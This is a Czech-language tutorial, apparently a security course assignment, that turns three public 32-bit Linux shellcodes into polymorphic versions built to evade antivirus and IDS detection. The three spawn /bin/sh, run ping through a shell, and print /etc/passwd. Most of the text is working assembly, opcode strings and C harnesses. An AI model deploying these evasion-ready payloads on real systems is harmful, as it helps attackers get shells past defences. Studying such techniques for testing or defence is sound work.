Polymorfní 32bitové shellcody

V šestém textu této 32bitové série bude demonstrováno psaní polymorfních shellcodů, budou přepsány 3 shellcody z veřejně dostupných zdrojů do jejich polymorfní verze. Polymorfní shellcode nesmí být větší jak 150 % délky originálu.

Běžné shellcody jsou fingerprintované AV a IDS, proto nejsou během penetračního testování příliš vhodné. Například „/bin/bash/“ může být pro IDS jasné varování, že se děje něco podezřelého. Problém není možné kompletně vyřešit používáním custom encoderů, protože ty jsou vždy identifikovatelné pomocí stubu a instrukcí, které obsahuje. Naštěstí existuje řešení a tím jsou polymorfní shellcody. Díky polymorfním shellcodům je možné obelstít běžné AV a IDS řešení.

Polymorfní shellcode může používat například:

 • vložení instrukcí, které nemají žádnou funkci a nemění funkcionality shellcodu
 • používání odlišných nebo náhodných registrů
 • randomizace pořadí prováděných instrukcí
 • používání přímo ESP oproti push/pop instrukcím
 • nepoužívání známých hex řetězců
 • používání exotičtějších instrukcí

Jako první použijeme jednoduchý execve(“/bin/sh”) shellcode s originální délkou 28 bytů. Zdroj

/*
Title:    Linux x86 execve("/bin/sh") - 28 bytes
Author:    Jean Pascal Pereira <pereira@secbiz.de>
Web:    http://0xffe4.org
Disassembly of section .text:
08048060 <_start>:
 8048060: 31 c0         xor  %eax,%eax
 8048062: 50          push  %eax
 8048063: 68 2f 2f 73 68    push  $0x68732f2f
 8048068: 68 2f 62 69 6e    push  $0x6e69622f
 804806d: 89 e3         mov  %esp,%ebx
 804806f: 89 c1         mov  %eax,%ecx
 8048071: 89 c2         mov  %eax,%edx
 8048073: b0 0b         mov  $0xb,%al
 8048075: cd 80         int  $0x80
 8048077: 31 c0         xor  %eax,%eax
 8048079: 40          inc  %eax
 804807a: cd 80         int  $0x80
*/
#include <stdio.h>
char shellcode[] = "\x31\xc0\x50\x68\x2f\x2f\x73"
          "\x68\x68\x2f\x62\x69\x6e\x89"
          "\xe3\x89\xc1\x89\xc2\xb0\x0b"
          "\xcd\x80\x31\xc0\x40\xcd\x80";
int main()
{
 fprintf(stdout,"Lenght: %d\n",strlen(shellcode));
 (*(void (*)()) shellcode)();
}

Nejdříve si shellcode analyzujeme (nikdy nespouštějte neznámé shellcody bez předchozí analýzy), následně jej zkompilujeme a otestujeme:

 • gcc -fno-stack-protector -z execstack exec.c -o exec

Jak můžeme vidět, shellcode funguje, budou provedeny následující modifikace:

 • xor reg, reg:
  • sub reg, reg
 • mov reg1, reg2:
  • push reg2 + pop reg1
 • push 0x31373737:
  • add eax,0x30363636
  • add eax,0x01010101
  • push eax
  • xor eax,eax

Finální nasm soubor:

; Filename: exec-polymorphic.nasm
; Author: SLAE-14209
 
global _start      
 
section .text
 
_start:
   
   ;xor eax, eax
   sub eax, eax
   push eax
   push 0x68732f2f
   ;push 0x6e69622f
   add eax, 0x5d58511e
   add eax, 0x11111111
   push eax
   xor eax, eax
   ;mov ebx, esp
   push esp
   pop ebx
   ;mov ecx, eax
   push eax
   pop ecx
   mov edx, eax
   mov al, 0xb
   int 0x80
   
   ;xor eax, eax
   sub eax, eax
   inc eax
   int 0x80

Zkompilujeme a spustíme:

 • nasm -f elf32 -o exec.o exec.nasm
 • ld exec.o -o exec

Extrahujeme shellcode:

 • objdump -d ./exec |grep ‘[0-9a-f]:’|grep -v ‘file’|cut -f2 -d:|cut -f1-6 -d’ ‘|tr -s ‘ ‘|tr ‘\t’ ‘ ‘|sed ‘s/ $//g’|sed ‘s/ /\\x/g’|paste -d ” -s |sed ‘s/^/”/’|sed ‘s/$/”/g’

“\x29\xc0\x50\x05\x1e\x1e\x62\x57\x05\x11\x11\x11\x11\x50\x31\xc0\x68\x2f\x62\x69\x6e\x54\x5b\x50\x59\x50\x59\xb0\x0b\xcd\x80\x29\xc0\x40\xcd\x80”

Vytvoříme C soubor:

#include <stdio.h>
#include <string.h>
 
char shellcode[] = "\x29\xc0\x50\x68\x2f\x2f\x73\x68\x05\x1e\x51\x58\x5d\x05\x11\x11\x11\x11\x50\x31\xc0\x54\x5b\x50\x59\x89\xc2\xb0\x0b\xcd\x80\x29\xc0\x40\xcd\x80";
 
int main()
{
 fprintf(stdout,"Lenght: %d\n",strlen(shellcode));
 (*(void (*)()) shellcode)();
}

Zkompilujeme a spustíme:

 • gcc -fno-stack-protector -z execstack shellcode.c -o shellcode

Velikost je 37 bytů.

Jako druhý shellcode použijeme sys_execve(“/bin/sh/, “-c”, “ping localhost”), který má velikost 55 bytů. Zdroj

char asshole[] = "\x6a\x0b"       // push  $0xb
        "\x58"         // pop  %eax
        "\x99"         // cltd
        "\x52"         // push  %edx
        "\x68\x73\x74\x20\x20" // push  $0x20207473
        "\x68\x61\x6c\x68\x6f" // push  $0x6f686c61
        "\x68\x20\x6c\x6f\x63" // push  $0x636f6c20
        "\x68\x70\x69\x6e\x67" // push  $0x676e6970
        "\x89\xe6"       // mov  %esp,%esi
        "\x52"         // push  %edx
        "\x66\x68\x2d\x63"   // pushw $0x632d
        "\x89\xe1"       // mov  %esp,%ecx
        "\x52"         // push  %edx
        "\x68\x2f\x2f\x73\x68" // push  $0x68732f2f
        "\x68\x2f\x62\x69\x6e" // push  $0x6e69622f
        "\x89\xe3"       // mov  %esp,%ebx
        "\x52"         // push  %edx
        "\x56"         // push  %esi
        "\x51"         // push  %ecx
        "\x53"         // push  %ebx
        "\x89\xe1"       // mov  %esp,%ecx
        "\xcd\x80";       // int  $0x80
        
int main(int argc, char **argv)
{
 int (*func)();
 func = (int (*)()) asshole;
 (int)(*func)();
}

Jak můžeme vidět ze screenu výše, shellcode funguje.

Polymorfní kód:

 • push 0x68732f2f:
  • mov ebx, 0x68732f2e
  • inc ebx
  • push ebx
 • push 0x6e69622f:
  • mov ebx, 0x6e696230
  • dec ebx
  • push ebx
 • push word 0x632d:
  • add edx, 0x521d
  • add edx, 0x1110
  • push edx
  • xor edx, edx

Finální nasm soubor:

; Filename: ping-polymorphic.nasm
; Author: SLAE-14209
 
global _start      
section .text
_start:
 
  push 0xb
  pop eax
  cdq
  push edx
  
  push 0x74736f68     ; 
  push 0x6c61636f     ; 
  push 0x6c20676e     ; => "//bin/////ping localhost"
  push 0x69702f2f     ; 
  push 0x2f2f2f6e     ; 
  push 0x69622f2f     ;
  
  mov esi, esp
  push edx
  ;push word 0x632d    ; "c-"
  add dx, 0x521d
  add dx, 0x1110
  push dx
  xor edx, edx
  
  mov ecx, esp
  push edx
  ;push 0x68732f2f    ; "hs//"
  mov ebx, 0x68732f2e
  inc ebx
  push ebx
  
  ;push 0x6e69622f    ; "nib/"
  mov ebx, 0x6e696230
  dec ebx
  push ebx
  
  mov ebx, esp
  push edx
  push esi
  push ecx  
  push ebx
  mov ecx, esp
  int 0x80

Zkompilujeme a spustíme:

 • nasm -f elf32 -o ping.o ping.nasm
 • ld ping.o -o ping

Extrahujeme shellcode:

 • objdump -d ./ping |grep ‘[0-9a-f]:’|grep -v ‘file’|cut -f2 -d:|cut -f1-6 -d’ ‘|tr -s ‘ ‘|tr ‘\t’ ‘ ‘|sed ‘s/ $//g’|sed ‘s/ /\\x/g’|paste -d ” -s |sed ‘s/^/”/’|sed ‘s/$/”/g’

“\x6a\x0b\x58\x99\x52\x68\x68\x6f\x73\x74\x68\x6f\x63\x61\x6c\x68\x6e\x67\x20\x6c\x68\x2f\x2f\x70\x69\x68\x6e\x2f\x2f\x2f\x68\x2f\x2f\x62\x69\x89\xe6\x52\x66\x81\xc2\x1d\x52\x66\x81\xc2\x10\x11\x66\x52\x31\xd2\x89\xe1\x52\xbb\x2e\x2f\x73\x68\x43\x53\xbb\x30\x62\x69\x6e\x4b\x53\x89\xe3\x52\x56\x51\x53\x89\xe1\xcd\x80”

Vytvoříme C soubor:

#include <stdio.h>
#include <string.h>
 
char shellcode[] = "\x6a\x0b\x58\x99\x52\x68\x68\x6f\x73\x74\x68\x6f\x63\x61\x6c\x68\x6e\x67\x20\x6c\x68\x2f\x2f\x70\x69\x68\x6e\x2f\x2f\x2f\x68\x2f\x2f\x62\x69\x89\xe6\x52\x66\x81\xc2\x1d\x52\x66\x81\xc2\x10\x11\x66\x52\x31\xd2\x89\xe1\x52\xbb\x2e\x2f\x73\x68\x43\x53\xbb\x30\x62\x69\x6e\x4b\x53\x89\xe3\x52\x56\x51\x53\x89\xe1\xcd\x80";
 
int main()
{
 fprintf(stdout,"Lenght: %d\n",strlen(shellcode));
 (*(void (*)()) shellcode)();
}

Zkompilujeme:

 • gcc -fno-stack-protector -z execstack shellcode.c -o shellcode

Velikost přepsaného shellcodu je 79 bytů.

Jako třetí shellcode použijeme shellcode, který provádí příkaz “cat /etc/passwd” s délkou 43 bytů. Zdroj

#include <stdio.h>
 
const char shellcode[]="\x31\xc0" // xorl %eax,%eax
"\x99" // cdq
"\x52" // push edx
"\x68\x2f\x63\x61\x74" // push dword 0x7461632f
"\x68\x2f\x62\x69\x6e" // push dword 0x6e69622f
"\x89\xe3" // mov ebx,esp
"\x52" // push edx
"\x68\x73\x73\x77\x64" // pu sh dword 0x64777373
"\x68\x2f\x2f\x70\x61" // push dword 0x61702f2f
"\x68\x2f\x65\x74\x63" // push dword 0x6374652f
"\x89\xe1" // mov ecx,esp
"\xb0\x0b" // mov $0xb,%al
"\x52" // push edx
"\x51" // push ecx
"\x53" // push ebx
"\x89\xe1" // mov ecx,esp
"\xcd\x80" ; // int 80h
 
int main()
{
(*(void (*)()) shellcode)();
 
return 0;
}
 
 
/*
shellcode[]=    "\x31\xc0\x99\x52\x68\x2f\x63\x61\x74\x68\x2f\x62\x69\x6e\x89\xe3\x52\x68\x73\x73\x77\x64" 
        "\x68\x2f\x2f\x70\x61\x68\x2f\x65\x74\x63\x89\xe1\xb0\x0b\x52\x51\x53\x89\xe1\xcd\x80";
*/

Shellcode funguje, provedené změny:

 •  xor eax,eax:
  • sub eax, eax
 •  push 0x7461632f:
  • add ebx, 0x6350521e
  • add ebx, 0x11111111
  • push ebx
  • xor ebx, ebx
 • push 0x6e69622f
  • add ebx, 0x7F7A7340
  • sub ebx, 0x11111111
  • push ebx
  • xor ebx, ebx
 • mov ebx,esp
  • push esp
  • pop ebx
 • mov al,0xb
  • mov al, 11

Finální nasm soubor:

; Filename: passwd-polymorphic.nasm
; Author: SLAE-14209
 
global _start      
section .text
_start:
   
  ;xor eax,eax
  sub eax, eax
  
  cdq
  push edx
  ;push 0x7461632f     ; "tac/"
  add eax, 0x6350521e
  add eax, 0x11111111
  push eax
  xor eax, eax
  
  ;push 0x6e69622f     ; "nib/"
  add eax, 0x7F7A7340
  sub eax, 0x11111111
  push eax
  xor eax, eax
  
  ;mov ebx,esp
  push esp
  pop ebx
 
  push edx
  push 0x64777373     ; "dwss"
  push 0x61702f2f     ; "ap//"  
  push 0x6374652f     ; "cte/"
  mov ecx, esp
  
  ;mov al,0xb
  mov al, 11
  
  push edx
  push ecx
  push ebx
  mov ecx, esp
  int 0x80  

Zkompilujeme a spustíme:

 • nasm -f elf32 -o passwd.o passwd.nasm
 • ld passwd.o -o passwd

Extrahujeme shellcode:

 • objdump -d ./passwd |grep ‘[0-9a-f]:’|grep -v ‘file’|cut -f2 -d:|cut -f1-6 -d’ ‘|tr -s ‘ ‘|tr ‘\t’ ‘ ‘|sed ‘s/ $//g’|sed ‘s/ /\\x/g’|paste -d ” -s |sed ‘s/^/”/’|sed ‘s/$/”/g’

“\x29\xc0\x99\x52\x05\x1e\x52\x50\x63\x05\x11\x11\x11\x11\x50\x31\xc0\x05\x40\x73\x7a\x7f\x2d\x11\x11\x11\x11\x50\x31\xc0\x54\x5b\x52\x68\x73\x73\x77\x64\x68\x2f\x2f\x70\x61\x68\x2f\x65\x74\x63\x89\xe1\xb0\x0b\x52\x51\x53\x89\xe1\xcd\x80”

Vytvoříme C soubor:

#include <stdio.h>
#include <string.h>
 
char shellcode[] = "\x29\xc0\x99\x52\x05\x1e\x52\x50\x63\x05\x11\x11\x11\x11\x50\x31\xc0\x05\x40\x73\x7a\x7f\x2d\x11\x11\x11\x11\x50\x31\xc0\x54\x5b\x52\x68\x73\x73\x77\x64\x68\x2f\x2f\x70\x61\x68\x2f\x65\x74\x63\x89\xe1\xb0\x0b\x52\x51\x53\x89\xe1\xcd\x80";
 
int main()
{
 fprintf(stdout,"Lenght: %d\n",strlen(shellcode));
 (*(void (*)()) shellcode)();
}

Zkompilujeme:

 • gcc -fno-stack-protector -z execstack shellcode.c -o shellcode

Velikost přepsaného shellcodu je 59 bytů. Všechny použité soubory můžete nalézt zde: https://github.com/Pal1Sec/SLAE32